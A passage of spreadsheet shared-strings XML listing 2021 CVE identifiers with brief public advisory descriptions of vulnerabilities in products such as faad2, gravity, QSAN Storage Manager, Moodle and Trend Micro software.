    <t>An issue was discovered in faad2 through 2.10.0. A NULL pointer dereference exists in the function get_sample() located in output.c. It allows an attacker to cause Denial of Service.</t>
  </si>
  <si>
    <t>CVE-2021-32277</t>
  </si>
  <si>
    <t>An issue was discovered in faad2 through 2.10.0. A heap-buffer-overflow exists in the function sbr_qmf_analysis_32 located in sbr_qmf.c. It allows an attacker to cause code Execution.</t>
  </si>
  <si>
    <t>CVE-2021-32278</t>
  </si>
  <si>
    <t>An issue was discovered in faad2 through 2.10.0. A heap-buffer-overflow exists in the function lt_prediction located in lt_predict.c. It allows an attacker to cause code Execution.</t>
  </si>
  <si>
    <t>CVE-2021-32280</t>
  </si>
  <si>
    <t>An issue was discovered in fig2dev before 3.2.8.. A NULL pointer dereference exists in the function compute_closed_spline() located in trans_spline.c. It allows an attacker to cause Denial of Service. The fixed version of fig2dev is 3.2.8.</t>
  </si>
  <si>
    <t>CVE-2021-32281</t>
  </si>
  <si>
    <t>An issue was discovered in gravity through 0.8.1. A heap-buffer-overflow exists in the function gnode_function_add_upvalue located in gravity_ast.c. It allows an attacker to cause code Execution.</t>
  </si>
  <si>
    <t>CVE-2021-32282</t>
  </si>
  <si>
    <t>An issue was discovered in gravity through 0.8.1. A NULL pointer dereference exists in the function ircode_add_check() located in gravity_ircode.c. It allows an attacker to cause Denial of Service.</t>
  </si>
  <si>
    <t>CVE-2021-32283</t>
  </si>
  <si>
    <t>An issue was discovered in gravity through 0.8.1. A NULL pointer dereference exists in the function gravity_string_to_value() located in gravity_value.c. It allows an attacker to cause Denial of Service.</t>
  </si>
  <si>
    <t>CVE-2021-32284</t>
  </si>
  <si>
    <t>An issue was discovered in gravity through 0.8.1. A NULL pointer dereference exists in the function ircode_register_pop_context_protect() located in gravity_ircode.c. It allows an attacker to cause Denial of Service.</t>
  </si>
  <si>
    <t>CVE-2021-32285</t>
  </si>
  <si>
    <t>An issue was discovered in gravity through 0.8.1. A NULL pointer dereference exists in the function list_iterator_next() located in gravity_core.c. It allows an attacker to cause Denial of Service.</t>
  </si>
  <si>
    <t>CVE-2021-32286</t>
  </si>
  <si>
    <t>An issue was discovered in hcxtools through 6.1.6. A global-buffer-overflow exists in the function pcapngoptionwalk located in hcxpcapngtool.c. It allows an attacker to cause code Execution.</t>
  </si>
  <si>
    <t>CVE-2021-32287</t>
  </si>
  <si>
    <t>An issue was discovered in heif through v3.6.2. A global-buffer-overflow exists in the function HevcDecoderConfigurationRecord::getPicWidth() located in hevcdecoderconfigrecord.cpp. It allows an attacker to cause code Execution.</t>
  </si>
  <si>
    <t>CVE-2021-32288</t>
  </si>
  <si>
    <t>An issue was discovered in heif through v3.6.2. A global-buffer-overflow exists in the function HevcDecoderConfigurationRecord::getPicHeight() located in hevcdecoderconfigrecord.cpp. It allows an attacker to cause code Execution.</t>
  </si>
  <si>
    <t>CVE-2021-32289</t>
  </si>
  <si>
    <t>An issue was discovered in heif through through v3.6.2. A NULL pointer dereference exists in the function convertByteStreamToRBSP() located in nalutil.cpp. It allows an attacker to cause Denial of Service.</t>
  </si>
  <si>
    <t>CVE-2021-3229</t>
  </si>
  <si>
    <t>Denial of service in ASUSWRT ASUS RT-AX3000 firmware versions 3.0.0.4.384_10177 and earlier versions allows an attacker to disrupt the use of device setup services via continuous login error.</t>
  </si>
  <si>
    <t>CVE-2021-32294</t>
  </si>
  <si>
    <t>An issue was discovered in libgig through 20200507. A heap-buffer-overflow exists in the function RIFF::List::GetSubList located in RIFF.cpp. It allows an attacker to cause code Execution.</t>
  </si>
  <si>
    <t>CVE-2021-32297</t>
  </si>
  <si>
    <t>An issue was discovered in LIEF through 0.11.4. A heap-buffer-overflow exists in the function main located in pe_reader.c. It allows an attacker to cause code Execution.</t>
  </si>
  <si>
    <t>CVE-2021-32298</t>
  </si>
  <si>
    <t>An issue was discovered in libiff through 20190123. A global-buffer-overflow exists in the function IFF_errorId located in error.c. It allows an attacker to cause code Execution.</t>
  </si>
  <si>
    <t>CVE-2021-32299</t>
  </si>
  <si>
    <t>An issue was discovered in pbrt through 20200627. A stack-buffer-overflow exists in the function pbrt::ParamSet::ParamSet() located in paramset.h. It allows an attacker to cause code Execution.</t>
  </si>
  <si>
    <t>CVE-2021-32305</t>
  </si>
  <si>
    <t>WebSVN before 2.6.1 allows remote attackers to execute arbitrary commands via shell metacharacters in the search parameter.</t>
  </si>
  <si>
    <t>CVE-2021-3239</t>
  </si>
  <si>
    <t>E-Learning System 1.0 suffers from an unauthenticated SQL injection vulnerability, which allows remote attackers to execute arbitrary code on the hosting web server and gain a reverse shell.</t>
  </si>
  <si>
    <t>CVE-2021-32399</t>
  </si>
  <si>
    <t>net/bluetooth/hci_request.c in the Linux kernel through 5.12.2 has a race condition for removal of the HCI controller.</t>
  </si>
  <si>
    <t>CVE-2021-32402</t>
  </si>
  <si>
    <t>Intelbras Router RF 301K Firmware 1.1.2 is vulnerable to Cross Site Request Forgery (CSRF) due to lack of validation and insecure configurations in inputs and modules.</t>
  </si>
  <si>
    <t>CVE-2021-32403</t>
  </si>
  <si>
    <t>Intelbras Router RF 301K Firmware 1.1.2 is vulnerable to Cross Site Request Forgery (CSRF) due to lack of security mechanisms for token protection and unsafe inputs and modules.</t>
  </si>
  <si>
    <t>CVE-2021-3242</t>
  </si>
  <si>
    <t>DuxCMS v3.1.3 was discovered to contain a SQL injection vulnerability via the component s/tools/SendTpl/index?keyword=.</t>
  </si>
  <si>
    <t>CVE-2021-32424</t>
  </si>
  <si>
    <t>In TrendNet TW100-S4W1CA 2.3.32, due to a lack of proper session controls, a threat actor could make unauthorized changes to an affected router via a specially crafted web page. If an authenticated user were to interact with a malicious web page it could allow for a complete takeover of the router.</t>
  </si>
  <si>
    <t>CVE-2021-32426</t>
  </si>
  <si>
    <t>In TrendNet TW100-S4W1CA 2.3.32, it is possible to inject arbitrary JavaScript into the router's web interface via the "echo" command.</t>
  </si>
  <si>
    <t>CVE-2021-32428</t>
  </si>
  <si>
    <t>SQL Injection vulnerability in viaviwebtech Android EBook App (Books App, PDF, ePub, Online Book Reading, Download Books) 10 via the author_id parameter to api.php.</t>
  </si>
  <si>
    <t>CVE-2021-3243</t>
  </si>
  <si>
    <t>Wfilter ICF 5.0.117 contains a cross-site scripting (XSS) vulnerability. An attacker in the same LAN can craft a packet with a malicious User-Agent header to inject a payload in its logs, where an attacker can take over the system by through its plugin-running function.</t>
  </si>
  <si>
    <t>CVE-2021-32434</t>
  </si>
  <si>
    <t>abcm2ps v8.14.11 was discovered to contain an out-of-bounds read in the function calculate_beam at draw.c.</t>
  </si>
  <si>
    <t>CVE-2021-32435</t>
  </si>
  <si>
    <t>Stack-based buffer overflow in the function get_key in parse.c of abcm2ps v8.14.11 allows remote attackers to cause a Denial of Service (DoS) via unspecified vectors.</t>
  </si>
  <si>
    <t>CVE-2021-32436</t>
  </si>
  <si>
    <t>An out-of-bounds read in the function write_title() in subs.c of abcm2ps v8.14.11 allows remote attackers to cause a Denial of Service (DoS) via unspecified vectors.</t>
  </si>
  <si>
    <t>CVE-2021-32437</t>
  </si>
  <si>
    <t>The gf_hinter_finalize function in GPAC 1.0.1 allows attackers to cause a denial of service (NULL pointer dereference) via a crafted file in the MP4Box command.</t>
  </si>
  <si>
    <t>CVE-2021-32438</t>
  </si>
  <si>
    <t>The gf_media_export_filters function in GPAC 1.0.1 allows attackers to cause a denial of service (NULL pointer dereference) via a crafted file in the MP4Box command.</t>
  </si>
  <si>
    <t>CVE-2021-32439</t>
  </si>
  <si>
    <t>Buffer overflow in the stbl_AppendSize function in MP4Box in GPAC 1.0.1 allows attackers to cause a denial of service or execute arbitrary code via a crafted file.</t>
  </si>
  <si>
    <t>CVE-2021-32440</t>
  </si>
  <si>
    <t>The Media_RewriteODFrame function in GPAC 1.0.1 allows attackers to cause a denial of service (NULL pointer dereference) via a crafted file in the MP4Box command.</t>
  </si>
  <si>
    <t>CVE-2021-32453</t>
  </si>
  <si>
    <t>SITEL CAP/PRX firmware version 5.2.01 allows an attacker with access to the local network, to access via HTTP to the internal configuration database of the device without any authentication. An attacker could exploit this vulnerability in order to obtain information about the device´s configuration.</t>
  </si>
  <si>
    <t>CVE-2021-32454</t>
  </si>
  <si>
    <t>SITEL CAP/PRX firmware version 5.2.01 makes use of a hardcoded password. An attacker with access to the device could modify these credentials, leaving the administrators of the device without access.</t>
  </si>
  <si>
    <t>CVE-2021-32455</t>
  </si>
  <si>
    <t>SITEL CAP/PRX firmware version 5.2.01, allows an attacker with access to the device´s network to cause a denial of service condition on the device. An attacker could exploit this vulnerability by sending HTTP requests massively.</t>
  </si>
  <si>
    <t>CVE-2021-32456</t>
  </si>
  <si>
    <t>SITEL CAP/PRX firmware version 5.2.01 allows an attacker with access to the local network of the device to obtain the authentication passwords by analysing the network traffic.</t>
  </si>
  <si>
    <t>CVE-2021-32457</t>
  </si>
  <si>
    <t>Trend Micro Home Network Security version 6.6.604 and earlier is vulnerable to an iotcl stack-based buffer overflow vulnerability which could allow an attacker to issue a specially crafted iotcl to escalate privileges on affected devices. An attacker must first obtain the ability to execute low-privileged code on the target device in order to exploit this vulnerability.</t>
  </si>
  <si>
    <t>CVE-2021-32458</t>
  </si>
  <si>
    <t>Trend Micro Home Network Security version 6.6.604 and earlier is vulnerable to an iotcl stack-based buffer overflow vulnerability which could allow an attacker to issue a specially crafted iotcl which could lead to code execution on affected devices. An attacker must first obtain the ability to execute low-privileged code on the target device in order to exploit this vulnerability.</t>
  </si>
  <si>
    <t>CVE-2021-32459</t>
  </si>
  <si>
    <t>Trend Micro Home Network Security version 6.6.604 and earlier contains a hard-coded password vulnerability in the log collection server which could allow an attacker to use a specially crafted network request to lead to arbitrary authentication. An attacker must first obtain the ability to execute high-privileged code on the target device in order to exploit this vulnerability.</t>
  </si>
  <si>
    <t>CVE-2021-3246</t>
  </si>
  <si>
    <t>A heap buffer overflow vulnerability in msadpcm_decode_block of libsndfile 1.0.30 allows attackers to execute arbitrary code via a crafted WAV file.</t>
  </si>
  <si>
    <t>CVE-2021-32460</t>
  </si>
  <si>
    <t>The Trend Micro Maximum Security 2021 (v17) consumer product is vulnerable to an improper access control vulnerability in the installer which could allow a local attacker to escalate privileges on a target machine. Please note than an attacker must already have local user privileges and access on the machine to exploit this vulnerability.</t>
  </si>
  <si>
    <t>CVE-2021-32461</t>
  </si>
  <si>
    <t>Trend Micro Password Manager (Consumer) version 5.0.0.1217 and below is vulnerable to an Integer Truncation Privilege Escalation vulnerability which could allow a local attacker to trigger a buffer overflow and escalate privileges on affected installations. An attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability.</t>
  </si>
  <si>
    <t>CVE-2021-32462</t>
  </si>
  <si>
    <t>Trend Micro Password Manager (Consumer) version 5.0.0.1217 and below is vulnerable to an Exposed Hazardous Function Remote Code Execution vulnerability which could allow an unprivileged client to manipulate the registry and escalate privileges to SYSTEM on affected installations. Authentication is required to exploit this vulnerability.</t>
  </si>
  <si>
    <t>CVE-2021-32463</t>
  </si>
  <si>
    <t>An incorrect permission assignment denial-of-service vulnerability in Trend Micro Apex One, Apex One as a Service (SaaS), Worry-Free Business Security 10.0 SP1 and Worry-Free Servgices could allow a local attacker to escalate privileges and delete files with system privileges on affected installations. Please note: an attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability.</t>
  </si>
  <si>
    <t>CVE-2021-32464</t>
  </si>
  <si>
    <t>An incorrect permission assignment privilege escalation vulnerability in Trend Micro Apex One, Apex One as a Service and Worry-Free Business Security Services could allow an attacker to modify a specific script before it is executed. Please note: an attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability.</t>
  </si>
  <si>
    <t>CVE-2021-32465</t>
  </si>
  <si>
    <t>An incorrect permission preservation vulnerability in Trend Micro Apex One, Apex One as a Service and OfficeScan XG SP1 could allow a remote user to perform an attack and bypass authentication on affected installations. Please note: an attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability.</t>
  </si>
  <si>
    <t>CVE-2021-32466</t>
  </si>
  <si>
    <t>An uncontrolled search path element privilege escalation vulnerability in Trend Micro HouseCall for Home Networks version 5.3.1225 and below could allow an attacker to escalate privileges by placing a custom crafted file in a specific directory to load a malicious library. Please note that an attacker must first obtain the ability to execute low-privileged code on the target system to exploit this vulnerability.</t>
  </si>
  <si>
    <t>CVE-2021-32467</t>
  </si>
  <si>
    <t>MediaTek microchips, as used in NETGEAR devices through 2021-11-11 and other devices, mishandle the WPS (Wi-Fi Protected Setup) protocol. (Affected Chipsets MT7603E, MT7610, MT7612, MT7613, MT7615, MT7620, MT7622, MT7628, MT7629, MT7915; Affected Software Versions 7.4.0.0; Out-of-bounds read).</t>
  </si>
  <si>
    <t>CVE-2021-32468</t>
  </si>
  <si>
    <t>CVE-2021-32469</t>
  </si>
  <si>
    <t>MediaTek microchips, as used in NETGEAR devices through 2021-11-11 and other devices, mishandle the WPS (Wi-Fi Protected Setup) protocol. (Affected Chipsets MT7603E, MT7610, MT7612, MT7613, MT7615, MT7620, MT7622, MT7628, MT7629, MT7915 Affected Software Versions 7.4.0.0; Out-of-bounds read).</t>
  </si>
  <si>
    <t>CVE-2021-32470</t>
  </si>
  <si>
    <t>Craft CMS before 3.6.13 has an XSS vulnerability.</t>
  </si>
  <si>
    <t>CVE-2021-32471</t>
  </si>
  <si>
    <t>Insufficient input validation in the Marvin Minsky 1967 implementation of the Universal Turing Machine allows program users to execute arbitrary code via crafted data. For example, a tape head may have an unexpected location after the processing of input composed of As and Bs (instead of 0s and 1s). NOTE: the discoverer states "this vulnerability has no real-world implications."</t>
  </si>
  <si>
    <t>CVE-2021-32472</t>
  </si>
  <si>
    <t>Teachers exporting a forum in CSV format could receive a CSV of forums from all courses in some circumstances. Moodle versions 3.10 to 3.10.3, 3.9 to 3.9.6 and 3.8 to 3.8.8 are affected.</t>
  </si>
  <si>
    <t>CVE-2021-32473</t>
  </si>
  <si>
    <t>It was possible for a student to view their quiz grade before it had been released, using a quiz web service. Moodle 3.10 to 3.10.3, 3.9 to 3.9.6, 3.8 to 3.8.8, 3.5 to 3.5.17 and earlier unsupported versions are affected</t>
  </si>
  <si>
    <t>CVE-2021-32474</t>
  </si>
  <si>
    <t>An SQL injection risk existed on sites with MNet enabled and configured, via an XML-RPC call from the connected peer host. Note that this required site administrator access or access to the keypair. Moodle 3.10 to 3.10.3, 3.9 to 3.9.6, 3.8 to 3.8.8, 3.5 to 3.5.17 and earlier unsupported versions are affected.</t>
  </si>
  <si>
    <t>CVE-2021-32475</t>
  </si>
  <si>
    <t>ID numbers displayed in the quiz grading report required additional sanitizing to prevent a stored XSS risk. Moodle 3.10 to 3.10.3, 3.9 to 3.9.6, 3.8 to 3.8.8, 3.5 to 3.5.17 and earlier unsupported versions are affected.</t>
  </si>
  <si>
    <t>CVE-2021-32476</t>
  </si>
  <si>
    <t>A denial-of-service risk was identified in the draft files area, due to it not respecting user file upload limits. Moodle versions 3.10 to 3.10.3, 3.9 to 3.9.6, 3.8 to 3.8.8, 3.5 to 3.5.17 and earlier unsupported versions are affected.</t>
  </si>
  <si>
    <t>CVE-2021-32477</t>
  </si>
  <si>
    <t>The last time a user accessed the mobile app is displayed on their profile page, but should be restricted to users with the relevant capability (site administrators by default). Moodle versions 3.10 to 3.10.3 are affected.</t>
  </si>
  <si>
    <t>CVE-2021-32478</t>
  </si>
  <si>
    <t>The redirect URI in the LTI authorization endpoint required extra sanitizing to prevent reflected XSS and open redirect risks. Moodle versions 3.10 to 3.10.3, 3.9 to 3.9.6, 3.8 to 3.8.8 and earlier unsupported versions are affected.</t>
  </si>
  <si>
    <t>CVE-2021-32481</t>
  </si>
  <si>
    <t>Cloudera Hue 4.6.0 allows XSS via the type parameter.</t>
  </si>
  <si>
    <t>CVE-2021-32482</t>
  </si>
  <si>
    <t>Cloudera Manager 5.x, 6.x, 7.1.x, 7.2.x, and 7.3.x allows XSS via the path parameter.</t>
  </si>
  <si>
    <t>CVE-2021-32483</t>
  </si>
  <si>
    <t>Cloudera Manager 7.2.4 has Incorrect Access Control, allowing Escalation of Privileges to view the restricted Dashboard.</t>
  </si>
  <si>
    <t>CVE-2021-32484</t>
  </si>
  <si>
    <t>In modem 2G RRM, there is a possible system crash due to a heap buffer overflow. This could lead to remote denial of service with no additional execution privileges needed. User interaction is not needed for exploitation. Patch ID: MOLY00500621; Issue ID: ALPS04964917.</t>
  </si>
  <si>
    <t>CVE-2021-32485</t>
  </si>
  <si>
    <t>In modem 2G RRM, there is a possible system crash due to a heap buffer overflow. This could lead to remote denial of service with no additional execution privileges needed. User interaction is not needed for exploitation. Patch ID: MOLY00500621; Issue ID: ALPS04964926.</t>
  </si>
  <si>
    <t>CVE-2021-32486</t>
  </si>
  <si>
    <t>In modem 2G RRM, there is a possible system crash due to a heap buffer overflow. This could lead to remote denial of service with no additional execution privileges needed. User interaction is not needed for exploitation. Patch ID: MOLY00500621; Issue ID: ALPS04964928.</t>
  </si>
  <si>
    <t>CVE-2021-32487</t>
  </si>
  <si>
    <t>In modem 2G RRM, there is a possible system crash due to a heap buffer overflow. This could lead to remote denial of service with no additional execution privileges needed. User interaction is not needed for exploitation. Patch ID: MOLY00500736; Issue ID: ALPS04938456.</t>
  </si>
  <si>
    <t>CVE-2021-32489</t>
  </si>
  <si>
    <t>An issue was discovered in the _send_secure_msg() function of Yubico yubihsm-shell through 2.0.3. The function does not correctly validate the embedded length field of an authenticated message received from the device because response_msg.st.len=8 can be accepted but triggers an integer overflow, which causes CRYPTO_cbc128_decrypt (in OpenSSL) to encounter an undersized buffer and experience a segmentation fault. The yubihsm-shell project is included in the YubiHSM 2 SDK product.</t>
  </si>
  <si>
    <t>CVE-2021-32490</t>
  </si>
  <si>
    <t>A flaw was found in djvulibre-3.5.28 and earlier. An out of bounds write in function DJVU::filter_bv() via crafted djvu file may lead to application crash and other consequences.</t>
  </si>
  <si>
    <t>CVE-2021-32491</t>
  </si>
  <si>
    <t>A flaw was found in djvulibre-3.5.28 and earlier. An integer overflow in function render() in tools/ddjvu via crafted djvu file may lead to application crash and other consequences.</t>
  </si>
  <si>
    <t>CVE-2021-32492</t>
  </si>
  <si>
    <t>A flaw was found in djvulibre-3.5.28 and earlier. An out of bounds read in function DJVU::DataPool::has_data() via crafted djvu file may lead to application crash and other consequences.</t>
  </si>
  <si>
    <t>CVE-2021-32493</t>
  </si>
  <si>
    <t>A flaw was found in djvulibre-3.5.28 and earlier. A heap buffer overflow in function DJVU::GBitmap::decode() via crafted djvu file may lead to application crash and other consequences.</t>
  </si>
  <si>
    <t>CVE-2021-32496</t>
  </si>
  <si>
    <t>SICK Visionary-S CX up version 5.21.2.29154R are vulnerable to an Inadequate Encryption Strength vulnerability concerning the internal SSH interface solely used by SICK for recovering returned devices. The use of weak ciphers make it easier for an attacker to break the security that protects information transmitted from the client to the SSH server, assuming the attacker has access to the network on which the device is connected. This can increase the risk that encryption will be compromised, leading to the exposure of sensitive user information and man-in-the-middle attacks.</t>
  </si>
  <si>
    <t>CVE-2021-32497</t>
  </si>
  <si>
    <t>SICK SOPAS ET before version 4.8.0 allows attackers to wrap any executable file into an SDD and provide this to a SOPAS ET user. When a user starts the emulator the executable is run without further checks.</t>
  </si>
  <si>
    <t>CVE-2021-32498</t>
  </si>
  <si>
    <t>SICK SOPAS ET before version 4.8.0 allows attackers to manipulate the pathname of the emulator and use path traversal to run an arbitrary executable located on the host system. When the user starts the emulator from SOPAS ET the corresponding executable will be started instead of the emulator</t>
  </si>
  <si>
    <t>CVE-2021-32499</t>
  </si>
  <si>
    <t>SICK SOPAS ET before version 4.8.0 allows attackers to manipulate the command line arguments to pass in any value to the Emulator executable.</t>
  </si>
  <si>
    <t>CVE-2021-32503</t>
  </si>
  <si>
    <t>Unauthenticated users can access sensitive web URLs through GET request, which should be restricted to maintenance users only. A malicious attacker could use this sensitive information’s to launch further attacks on the system.</t>
  </si>
  <si>
    <t>CVE-2021-32504</t>
  </si>
  <si>
    <t>CVE-2021-32506</t>
  </si>
  <si>
    <t>Absolute Path Traversal vulnerability in GetImage in QSAN Storage Manager allows remote authenticated attackers download arbitrary files via the Url path parameter. The referred vulnerability has been solved with the updated version of QSAN Storage Manager v3.3.3 .</t>
  </si>
  <si>
    <t>CVE-2021-32507</t>
  </si>
  <si>
    <t>Absolute Path Traversal vulnerability in FileDownload in QSAN Storage Manager allows remote authenticated attackers download arbitrary files via the Url path parameter. The referred vulnerability has been solved with the updated version of QSAN Storage Manager v3.3.3.</t>
  </si>
  <si>
    <t>CVE-2021-32508</t>
  </si>
  <si>
    <t>Absolute Path Traversal vulnerability in FileStreaming in QSAN Storage Manager allows remote authenticated attackers access arbitrary files by injecting the Symbolic Link following the Url path parameter. The referred vulnerability has been solved with the updated version of QSAN Storage Manager v3.3.3.</t>
  </si>
  <si>
    <t>CVE-2021-32509</t>
  </si>
  <si>
    <t>Absolute Path Traversal vulnerability in FileviewDoc in QSAN Storage Manager allows remote authenticated attackers access arbitrary files by injecting the Symbolic Link following the Url path parameter. The referred vulnerability has been solved with the updated version of QSAN Storage Manager v3.3.3.</t>
  </si>
  <si>
    <t>CVE-2021-32510</t>
  </si>
  <si>
    <t>QSAN Storage Manager through directory listing vulnerability in antivirus function allows remote authenticated attackers to list arbitrary directories by injecting file path parameter. The referred vulnerability has been solved with the updated version of QSAN Storage Manager v3.3.3.</t>
  </si>
  <si>
    <t>548</t>
  </si>
  <si>
    <t>CVE-2021-32511</t>
  </si>
  <si>
    <t>QSAN Storage Manager through directory listing vulnerability in ViewBroserList allows remote authenticated attackers to list arbitrary directories via the file path parameter. The referred vulnerability has been solved with the updated version of QSAN Storage Manager v3.3.3.</t>
  </si>
  <si>
    <t>CVE-2021-32512</t>
  </si>
  <si>
    <t>QuickInstall in QSAN Storage Manager does not filter special parameters properly that allows remote unauthenticated attackers to inject and execute arbitrary commands. The referred vulnerability has been solved with the updated version of QSAN Storage Manager v3.3.3.</t>
  </si>
  <si>
    <t>CVE-2021-32513</t>
  </si>
  <si>
    <t>QsanTorture in QSAN Storage Manager does not filter special parameters properly that allows remote unauthenticated attackers to inject and execute arbitrary commands. The referred vulnerability has been solved with the updated version of QSAN Storage Manager v3.3.3.</t>
  </si>
  <si>
    <t>CVE-2021-32514</t>
  </si>
  <si>
    <t>Improper access control vulnerability in FirmwareUpgrade in QSAN Storage Manager allows remote attackers to reboot and discontinue the device. The referred vulnerability has been solved with the updated version of QSAN Storage Manager v3.3.3.</t>
  </si>
  <si>
    <t>CVE-2021-32515</t>
  </si>
  <si>
    <t>Directory listing vulnerability in share_link in QSAN Storage Manager allows attackers to list arbitrary directories and further access credential information. The referred vulnerability has been solved with the updated version of QSAN Storage Manager v3.3.3.</t>
  </si>
  <si>
    <t>CVE-2021-32516</t>
  </si>
  <si>
    <t>Path traversal vulnerability in share_link in QSAN Storage Manager allows remote attackers to download arbitrary files. The referred vulnerability has been solved with the updated version of QSAN Storage Manager v3.3.3.</t>
  </si>
  <si>
    <t>CVE-2021-32517</t>
  </si>
  <si>
    <t>Improper access control vulnerability in share_link in QSAN Storage Manager allows remote attackers to download arbitrary files using particular parameter in download function. The referred vulnerability has been solved with the updated version of QSAN Storage Manager v3.3.3.</t>
  </si>
  <si>
    <t>CVE-2021-32518</t>
  </si>
  <si>
    <t>A vulnerability in share_link in QSAN Storage Manager allows remote attackers to create a symbolic link then access arbitrary files. The referred vulnerability has been solved with the updated version of QSAN Storage Manager v3.3.3.</t>
  </si>
  <si>
    <t>CVE-2021-32519</t>
  </si>
  <si>
    <t>Use of password hash with insufficient computational effort vulnerability in QSAN Storage Manager, XEVO, SANOS allows remote attackers to recover the plain-text password by brute-forcing the MD5 hash. The referred vulnerability has been solved with the updated version of QSAN Storage Manager v3.3.2, QSAN XEVO v2.1.0, and QSAN SANOS v2.1.0.</t>
  </si>
  <si>
    <t>CVE-2021-3252</t>
  </si>
  <si>
    <t>KACO New Energy XP100U Up to XP-JAVA 2.0 is affected by incorrect access control. Credentials will always be returned in plain-text from the local server during the KACO XP100U authentication process, regardless of whatever passwords have been provided, which leads to an information disclosure vulnerability.</t>
  </si>
  <si>
    <t>CVE-2021-32520</t>
  </si>
  <si>
    <t>Use of hard-coded cryptographic key vulnerability in QSAN Storage Manager allows attackers to obtain users’ credentials and related permissions. Suggest contacting with QSAN and refer to recommendations in QSAN Document.</t>
  </si>
  <si>
    <t>CVE-2021-32521</t>
  </si>
  <si>
    <t>Use of MAC address as an authenticated password in QSAN Storage Manager, XEVO, SANOS allows local attackers to escalate privileges. Suggest contacting with QSAN and refer to recommendations in QSAN Document.</t>
  </si>
  <si>
    <t>CVE-2021-32522</t>
  </si>
  <si>
    <t>Improper restriction of excessive authentication attempts vulnerability in QSAN Storage Manager, XEVO, SANOS allows remote attackers to discover users’ credentials and obtain access via a brute force attack. Suggest contacting with QSAN and refer to recommendations in QSAN Document.</t>
  </si>
  <si>
    <t>CVE-2021-32523</t>
  </si>
  <si>
    <t>Improper authorization vulnerability in QSAN Storage Manager allows remote privileged users to bypass the access control and execute arbitrary commands. Suggest contacting with QSAN and refer to recommendations in QSAN Document.</t>
  </si>
  <si>
    <t>CVE-2021-32524</t>
  </si>
  <si>
    <t>Command injection vulnerability in QSAN Storage Manager allows remote privileged users to execute arbitrary commands. Suggest contacting with QSAN and refer to recommendations in QSAN Document.</t>
  </si>
  <si>
    <t>CVE-2021-32525</t>
  </si>
  <si>
    <t>The same hard-coded password in QSAN Storage Manager's in the firmware allows remote attackers to access the control interface with the administrator’s credential, entering the hard-coded password of the debug mode to execute the restricted system instructions. The referred vulnerability has been solved with the updated version of QSAN Storage Manager v3.3.3.</t>
  </si>
  <si>
    <t>CVE-2021-32526</t>
  </si>
  <si>
    <t>Incorrect permission assignment for critical resource vulnerability in QSAN Storage Manager allows authenticated remote attackers to access arbitrary password files. Suggest contacting with QSAN and refer to recommendations in QSAN Document.</t>
  </si>
  <si>
    <t>CVE-2021-32527</t>
  </si>
  <si>
    <t>Path traversal vulnerability in QSAN Storage Manager allows remote unauthenticated attackers to download arbitrary files thru injecting file path in download function. Suggest contacting with QSAN and refer to recommendations in QSAN Document.</t>
  </si>
  <si>
    <t>CVE-2021-32528</t>
  </si>
  <si>
    <t>Observable behavioral discrepancy vulnerability in QSAN Storage Manager allows remote attackers to obtain the system information without permissions. Suggest contacting with QSAN and refer to recommendations in QSAN Document.</t>
  </si>
  <si>
    <t>CVE-2021-32529</t>
  </si>
  <si>
    <t>Command injection vulnerability in QSAN XEVO, SANOS allows remote unauthenticated attackers to execute arbitrary commands. Suggest contacting with QSAN and refer to recommendations in QSAN Document.</t>
  </si>
  <si>
    <t>CVE-2021-32530</t>
  </si>
  <si>
    <t>OS command injection vulnerability in Array function in QSAN XEVO allows remote unauthenticated attackers to execute arbitrary commands via status parameter. The referred vulnerability has been solved with the updated version of QSAN XEVO v2.1.0.</t>
  </si>
  <si>
    <t>CVE-2021-32531</t>
  </si>
  <si>
    <t>OS command injection vulnerability in Init function in QSAN XEVO allows remote attackers to execute arbitrary commands without permissions. The referred vulnerability has been solved with the updated version of QSAN XEVO v2.1.0.</t>
  </si>
  <si>
    <t>CVE-2021-32532</t>
  </si>
  <si>
    <t>Path traversal vulnerability in back-end analysis function in QSAN XEVO allows remote attackers to download arbitrary files without permissions. The referred vulnerability has been solved with the updated version of QSAN XEVO v2.1.0.</t>
  </si>
  <si>
    <t>CVE-2021-32533</t>
  </si>
  <si>
    <t>The QSAN SANOS setting page does not filter special parameters. Remote attackers can use this vulnerability to inject and execute arbitrary commands without permissions. The referred vulnerability has been solved with the updated version of QSAN SANOS v2.1.0.</t>
  </si>
  <si>
    <t>CVE-2021-32534</t>
  </si>
  <si>
    <t>QSAN SANOS factory reset function does not filter special parameters. Remote attackers can use this vulnerability to inject and execute arbitrary commands without permissions. The referred vulnerability has been solved with the updated version of QSAN SANOS v2.1.0.</t>
  </si>
  <si>
    <t>CVE-2021-32535</t>
  </si>
  <si>
    <t>The vulnerability of hard-coded default credentials in QSAN SANOS allows unauthenticated remote attackers to obtain administrator’s permission and execute arbitrary functions. The referred vulnerability has been solved with the updated version of QSAN SANOS v2.1.0.</t>
  </si>
  <si>
    <t>CVE-2021-32536</t>
  </si>
  <si>
    <t>The login page in the MCUsystem does not filter with special characters, which allows remote attackers can inject JavaScript without privilege and thus perform reflected XSS attacks.</t>
  </si>
  <si>
    <t>CVE-2021-32537</t>
  </si>
  <si>
    <t>Realtek HAD contains a driver crashed vulnerability which allows local side attackers to send a special string to the kernel driver in a userâ€™s mode. Due to unexpected commands, the kernel driver will cause the system crashed.</t>
  </si>
  <si>
    <t>CVE-2021-32538</t>
  </si>
  <si>
    <t>ARTWARE CMS parameter of image upload function does not filter the type of upload files which allows remote attackers can upload arbitrary files without logging in, and further execute code unrestrictedly.</t>
  </si>
  <si>
    <t>CVE-2021-32539</t>
  </si>
  <si>
    <t>Add event in calendar function in the 101EIP system does not filter special characters in specific fields, which allows remote authenticated users to inject JavaScript and perform a stored XSS attack.</t>
  </si>
  <si>
    <t>CVE-2021-3254</t>
  </si>
  <si>
    <t>Asus DSL-N14U-B1 1.1.2.3_805 allows remote attackers to cause a Denial of Service (DoS) via a TCP SYN scan using nmap.</t>
  </si>
  <si>
    <t>CVE-2021-32540</t>
  </si>
  <si>
    <t>Add announcement function in the 101EIP system does not filter special characters, which allows authenticated users to inject JavaScript and perform a stored XSS attack.</t>
  </si>
  <si>
    <t>CVE-2021-32541</t>
  </si>
  <si>
    <t>The CTS Web transaction system related to authentication and session management is implemented incorrectly, which allows remote unauthenticated attackers can send a large number of valid usernames, and force those logged-in account to log out, causing the user to be unable to access the services</t>
  </si>
  <si>
